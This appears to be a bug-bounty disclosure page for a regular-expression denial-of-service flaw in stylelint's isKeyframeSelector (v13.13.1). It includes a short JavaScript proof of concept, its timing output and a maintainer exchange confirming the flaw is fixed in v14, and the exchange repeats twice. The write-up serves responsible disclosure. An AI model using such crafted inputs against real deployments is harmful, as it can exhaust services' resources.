Inefficient Regular Expression Complexity in stylelint/stylelint

Valid

Reported on

Oct 16th 2021

Description

I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in stylelint.

It allows causing a denial of service when calling function isKeyframeSelector.

Proof of Concept

// PoC.js
var isKeyframeSelector = require("stylelint/lib/utils/isKeyframeSelector")


for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = '1'.repeat(i*10000)+"a";
    isKeyframeSelector(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

Check The Output

"attack_str.length: 10001: 290 ms"
"attack_str.length: 20001: 1072 ms"
"attack_str.length: 30001: 2047 ms"
"attack_str.length: 40001: 3640 ms"
"attack_str.length: 50001: 5688 ms"
"attack_str.length: 60001: 8237 ms"

Yeting Li

commented 2 years ago

Researcher

@admin, please see the security policy https://github.com/stylelint/stylelint/security/policy

We have contacted a member of the stylelint team and are waiting to hear back 2 years ago

A stylelint/stylelint maintainer

commented 2 years ago

Maintainer

Thanks for the report. Can you confirm if this is still an issue with the v14 branch as we recently updated a number of Regexes in it? If so, we welcome a pull request to the v14 branch.

Yeting Li

commented 2 years ago

Researcher

Hi, @maintainer, I tested the latest version (i.e., v13.13.1) of stylelint released on npm. I just verified that this issue does not exist on the v14 branch.

A stylelint/stylelint maintainer

commented 2 years ago

Maintainer

Thanks for checking the v14 branch. It's great news that the issue does not exist there. We hope to release version 14.0.0 of stylelint this week.

As such, do I mark this issue as invalid (or valid as the issue is in 13.13.1 but fixed)?

Yeting Li

commented 2 years ago

Researcher

Hi @maintainer, you can mark this issue as valid and indicate the specific version (i.e., 13.13.1) of the issue. Thanks a lot!

A stylelint/stylelint maintainer validated this vulnerability 2 years ago

Yeting Li has been awarded the disclosure bounty

The fix bounty is now up for grabs

A stylelint/stylelint maintainer marked this as fixed with commit 060310 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation

Yeting Li

commented 2 years ago

Researcher

@admin, please see the security policy https://github.com/stylelint/stylelint/security/policy

We have contacted a member of the stylelint team and are waiting to hear back 2 years ago

A stylelint/stylelint maintainer

commented 2 years ago

Maintainer

Thanks for the report. Can you confirm if this is still an issue with the v14 branch as we recently updated a number of Regexes in it? If so, we welcome a pull request to the v14 branch.

Yeting Li

commented 2 years ago

Researcher

Hi, @maintainer, I tested the latest version (i.e., v13.13.1) of stylelint released on npm. I just verified that this issue does not exist on the v14 branch.

A stylelint/stylelint maintainer

commented 2 years ago

Maintainer

Thanks for checking the v14 branch. It's great news that the issue does not exist there. We hope to release version 14.0.0 of stylelint this week.

As such, do I mark this issue as invalid (or valid as the issue is in 13.13.1 but fixed)?

Yeting Li

commented 2 years ago

Researcher

Hi @maintainer, you can mark this issue as valid and indicate the specific version (i.e., 13.13.1) of the issue. Thanks a lot!

A stylelint/stylelint maintainer validated this vulnerability 2 years ago

Yeting Li has been awarded the disclosure bounty

The fix bounty is now up for grabs

A stylelint/stylelint maintainer marked this as fixed with commit 060310 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation